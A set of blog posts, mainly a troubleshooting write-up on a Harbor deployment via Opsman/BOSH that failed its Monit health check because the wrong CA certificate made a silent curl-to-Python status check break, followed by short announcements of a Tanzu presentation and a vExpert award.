I made a simple mistake here. Previously, the customer had generated Certificates from their root CA. However, this time, they had set up an intermediate, issuing CA. I did not know this, and had assumed the certificate chain was the same as previously. So I pasted the wrong certificate into this field. The Root-CA, instead of the issuing, intermediate CA.

When I tried to deploy Harbor using Opsman, the deployment failed. "Error: 'harbor-app/4d891315-d61e-4891-8512-486b7f93e5a2 (0)' is not running after update. Review logs for failed jobs: harbor"

How it failed is interesting, and that is what this post is mostly about.

Opsman uses BOSH, under the covers, to create and manage the VMs, and their content, for any product it deploys.

It uses the Monit tool, to monitor the health of its VMs, and the result of Monit is also used to determine, whether a deployment was successfully completed or not.

In fact, it is left to Monit to start and stop the various processes on a BOSH-managed VM. So Monit will contain a config for specific processes, to start, stop, and monitor their health. This can be as simple as monitoring a process ID, or it can be custom scripts. In the case of Harbor, it's some custom scripts that I will detail below.

In order to further troubleshoot this issue, we had to dig a bit deeper into the logs. There are 2 ways to do this; you can download a log-bundle using the Opsman UI

Or you can SSH into the VM, using the BOSH commandline tool, and view the logs live in the /var/vcap/sys/log directory.

Examining the log structure, there are some things to note.

First of all, because this is a BOSH deployment of Harbor, there are various folders that refer to BOSH-specific items.
Harbor itself, runs as a set of Docker containers. So there you will also find a split between logs coming from Docker, or in this case, the results of Docker-Compose, and the Harbor app components itself.

If you look in the Harbor folder, we find the various logs that relate to starting and stopping of Harbor, and then a further folder, that contains the Harbor app-component logs (1 per container).

Opsman told us that the Harbor app itself was not starting. And we know it's actually using Monit to start, stop and monitor Harbor, through a set of scripts.

The monit log can be found here: /var/vcap/monit/monit.log

As I said, Harbor consists of a set of running Docker containers. If you wish to view these directly, you can actually use Docker on the VM.

SSH into the VM:

We need to run as root, and need to make sure the Docker client can find the local Docker daemon.

sudo su -
alias docker='/var/vcap/packages/docker/bin/docker -H unix:///var/vcap/sys/run/docker/dockerd.sock'

Now we can simply run 'docker ps' and see our containers.

Now the cool thing is, you can simply kill all these processes if you want, and Monit will restart them. That can be very useful when testing things.

Let's have a look at the Monit configuration for Harbor:

monit -v status

Monit is using a specific script to start and stop Harbor: /var/vcap/jobs/docker/bin/ctl
If it meets the failure condition, it will use the same script to try to restart it.

The output of the ctl script is saved to ctl.stdout.log
In that file, we can see that the Harbor startup is timing out, at least according to the script.

[Mon Feb 15 15:30:43 UTC 2021] Harbor service is not ready. Waiting for 5 seconds then check again.
[Mon Feb 15 15:30:48 UTC 2021] Harbor service is not ready. Waiting for 5 seconds then check again.
[Mon Feb 15 15:30:53 UTC 2021] Error: Harbor Service failed to start in 180 seconds.

Now the odd thing here was that when I checked 'docker ps', all the containers were actually running. In fact, I could even reach the Harbor web UI without any problem.

So Harbor was actually working. Why then was the ctl script concluding that the startup had failed? What was it tripping over?

Harbor is actually coming up normally every time. It's Monit that is confused.

Monit is set to check the existence of the file ‘/var/vcap/sys/run/harbor/harbor.pid’

However, for whatever reason, this file did not exist when I checked. So Monit keeps thinking Harbor failed to start, and tries to restart the whole container set.

This restart keeps failing too: as all containers are already running, the command '/var/vcap/jobs/loggr-system-metrics-agent/bin/ctl start' doesn’t seem to actually do anything in this case.
So Monit ends up in a loop, and BOSH (via Monit) reports the VM as being in a ‘failing’ state. This is why the deployment ‘fails’, even though Harbor itself did not.

So what is in the directory ‘/var/vcap/sys/run/harbor/’?

harbor.tmp.pid, not harbor.pid as Monit is expecting.
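
To make the consequence of that file name concrete, here is a minimal sketch of what a pidfile-based health check roughly boils down to. This is not Monit's implementation; the function name pidfile_healthy is made up for illustration, and the check is simplified to "the file exists and the PID in it is alive".

```sh
#!/bin/sh
# Illustrative sketch only: a simplified stand-in for a pidfile-based
# process check. pidfile_healthy is a hypothetical helper name.

# pidfile_healthy PIDFILE
# Succeeds only if PIDFILE exists and contains the PID of a live process.
pidfile_healthy() {
  ph_file="$1"
  # No pid file at the expected path: treated as "not running".
  [ -f "$ph_file" ] || return 1
  ph_pid="$(cat "$ph_file")"
  [ -n "$ph_pid" ] || return 1
  # kill -0 sends no signal; it only tests whether the process exists.
  kill -0 "$ph_pid" 2>/dev/null
}
```

With only harbor.tmp.pid present, a check like pidfile_healthy /var/vcap/sys/run/harbor/harbor.pid fails no matter how healthy the containers are, which matches what we saw.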

Now there was another thing that caught my attention: the cron.log file was filling up with these mysterious Python errors:

curl -s --cacert /var/vcap/jobs/harbor/config/ca.crt https:///api/v2.0/systeminfo
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/var/vcap/packages/python/python2.7/lib/python2.7/json/__init__.py", line 291, in load
    **kw)
  File "/var/vcap/packages/python/python2.7/lib/python2.7/json/__init__.py", line 339, in loads
    return _default_decoder.decode(s)
  File "/var/vcap/packages/python/python2.7/lib/python2.7/json/decoder.py", line 364, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "/var/vcap/packages/python/python2.7/lib/python2.7/json/decoder.py", line 382, in raw_decode
    raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded

This output in cron.log was a bit confusing. We can see it running a curl command using the CA cert. But then it spits out a bunch of Python errors? Are the two related? Where is this coming from?

To understand what is going on, I needed to dig into the scripts.

As it turns out, the ctl script is actually using a different script altogether to do a healthcheck on Harbor.

Ctl contains a function called ‘waitForHarbor’.
This merely calls ‘/bin/status_check’ repeatedly, and waits up to 180 seconds for it to succeed.

And it is the output of this ‘/bin/status_check’ script that is being logged to cron.log.

The ctl script is also responsible for maintaining the harbor.pid file. And this file is the health indicator that Monit is actually triggering on.
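
The interplay between the wait loop and the pid file can be sketched roughly as follows. This is not the actual ctl script from the Harbor BOSH release: the function names wait_for_service and start_with_pidfile are made up, and the step where a temporary pid file is only renamed to harbor.pid after the health check passes is an assumption, based on the harbor.tmp.pid file found earlier.

```sh
#!/bin/sh
# Illustrative sketch only, not the real ctl script.

# wait_for_service CHECK_CMD TIMEOUT INTERVAL
# Re-runs CHECK_CMD every INTERVAL seconds until it succeeds,
# or gives up once TIMEOUT seconds have been spent waiting.
wait_for_service() {
  wfs_check="$1"
  wfs_timeout="$2"
  wfs_interval="$3"
  wfs_waited=0
  while [ "$wfs_waited" -lt "$wfs_timeout" ]; do
    if $wfs_check >/dev/null 2>&1; then
      return 0
    fi
    echo "Service is not ready. Waiting for $wfs_interval seconds then check again."
    sleep "$wfs_interval"
    wfs_waited=$((wfs_waited + wfs_interval))
  done
  echo "Error: service failed to start in $wfs_timeout seconds."
  return 1
}

# start_with_pidfile CHECK_CMD RUN_DIR TIMEOUT INTERVAL
# Assumption: the pid file only gets its final name once the check passes.
start_with_pidfile() {
  swp_dir="$2"
  echo "$$" > "$swp_dir/harbor.tmp.pid"
  if wait_for_service "$1" "$3" "$4"; then
    mv "$swp_dir/harbor.tmp.pid" "$swp_dir/harbor.pid"
  else
    # Health check never passed: harbor.tmp.pid is left behind.
    return 1
  fi
}
```

If the check command never succeeds, the run directory ends up containing harbor.tmp.pid but no harbor.pid, even though the service being checked may be perfectly fine.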

So that explains the behavior we are seeing. But why is it not passing 'waitForHarbor', aka the ‘/bin/status_check’ script?

When we look at the ‘/bin/status_check’ script, it contains a bunch of healthchecks.

The source of the file can actually be found here, if you want to see for yourself: https://github.com/vmware/harbor-boshrelease/blob/master/jobs/harbor/templates/bin/status_check.erb.sh

This section immediately caught my eye:

You can actually run the entire script yourself, and then it becomes obvious where those Python errors were coming from:

So what is it doing here?

curl --cacert tells curl which CA certificate to use when verifying the certificate presented by the URL you specify.

If that verification fails, it will produce the text below.

However, in the check script, curl is run with -s for silent. In this case it will fail silently: curl won't produce any output at all.

url=`${curl_command} ${protocol}://${harbor_url}/api/v2.0/systeminfo | python -c "import sys, json; print json.load(sys.stdin)['registry_url']"`

But the script still pipes that (empty) output to Python, to parse it as JSON.

If curl doesn't fail, and the server certificate validates against the CA cert, then the Python JSON filter will simply return the registry URL from the response.

And this is where it fails. This section of the script contains no failure handling for the case where the CA cert you set in the config doesn't actually validate the cert used by Harbor itself. And this was the case for me: I had set the wrong CA cert (the root CA, instead of the intermediate, issuing CA).
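
For comparison, here is a minimal sketch of what a more defensive version of that step could look like. It is not taken from the Harbor BOSH release: get_registry_url is a made-up name, FETCH_CMD stands in for the real curl call, and the JSON field is extracted with a simple sed pattern (which assumes the key and its value sit on one line) instead of the Python one-liner.

```sh
#!/bin/sh
# Illustrative sketch only: failure handling around the systeminfo lookup.

# get_registry_url FETCH_CMD
# FETCH_CMD is any command or function that prints the JSON body of
# /api/v2.0/systeminfo and exits non-zero if the request fails.
get_registry_url() {
  if ! gru_body="$($1)"; then
    echo "Error: request to Harbor failed. Check that the configured CA cert matches the CA that issued Harbor's certificate." >&2
    return 1
  fi
  if [ -z "$gru_body" ]; then
    echo "Error: empty response from Harbor." >&2
    return 1
  fi
  # Pull out the value of "registry_url" from the JSON body.
  gru_url="$(printf '%s\n' "$gru_body" |
    sed -n 's/.*"registry_url"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p')"
  if [ -z "$gru_url" ]; then
    echo "Error: no registry_url field in the response." >&2
    return 1
  fi
  printf '%s\n' "$gru_url"
}
```

In a real check, FETCH_CMD would be a small function wrapping the curl call. Running curl with -sS instead of just -s would also help here: -S (--show-error) makes curl print its error message even in silent mode, so the certificate problem would show up in the log.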

So this was the root cause of Monit failing the VM: it was not getting past this part of the status_check script. But it's not really obvious from the logs, not even from cron.log, what exactly is going wrong!

The irony here is that Harbor actually was working fine. In fact, I have not been able to find any place where, or any reason why, Harbor itself requires the CA cert at all! It's only the check script that requires it, and that seems to be the only reason you have to provide the CA cert in the Opsman tile config!

Presentation “Tanzu for Dummies” – 29th Jan 2021

Thefluffyadmin — Thu, 21 Jan 2021 17:08:22 +0000

I will be doing a Tanzu Session on the 29th. This is my own effort to help explain the VMware Tanzu portfolio to our customers, and anyone else who might be interested!

"Tanzu for Dummies"
https://itq.eu/presentation-tanzu-for-dummies/

Modern software development is increasingly moving toward so-called cloud-native architectures. And to run these 'modern-apps', you will likely need containers, a little something called 'Kubernetes', and the infrastructure and integrated tools surrounding it, to bring your application to production.

To answer this need, VMware has introduced Tanzu. But what is VMware Tanzu? Is it a product? Is it a platform? Is it just Kubernetes, or is it more?

In this 'Tanzu for Dummies' session, I will take you on a trip through the VMware Tanzu portfolio and give you ITQ's take on it all!

We will pierce through the branding and acronyms, zoom in on the different Kubernetes flavors and editions that VMware currently has, and look at some of the products and technologies that surround them. I will talk about what these technologies do, where they came from, how VMware is positioning them and how they fit into the greater picture of the Tanzu portfolio. After this session you will leave with a better understanding of how VMware plans to answer the modern-app challenge with Tanzu, and how you can make your own modern applications thrive in the cloud-native world.

What is VMware Tanzu? Is it just Kubernetes, or is it more?

In this ‘Tanzu for Dummies’ session, @thefluffysysop will take you on a trip through the VMware Tanzu portfolio and give you ITQ’s take on it all! https://t.co/EG4InmHXPr #kubernetes #tanzu #vmware #cloudnative pic.twitter.com/73FfmbxsZk

— ITQ (@ITQ) January 21, 2021

VMware vExpert sub-program: Application Modernization 2020

Thefluffyadmin — Fri, 25 Sep 2020 16:22:09 +0000

Very honored to have been accepted into the inaugural VMware vExpert sub-program: Application Modernization 2020

Individuals who are awarded Application Modernization vExpert status are the cream of the crop when it comes to application modernization knowledge, including platforms that modern applications run on. They’re advocates of VMware Tanzu—a portfolio of VMware products and services for modernizing applications and infrastructure—as well as other application platforms running on VMware solutions. vExperts love “giving back” to the community by sharing their knowledge with their peers, whether through blogging or speaking at events like VMworld and VMUG.

test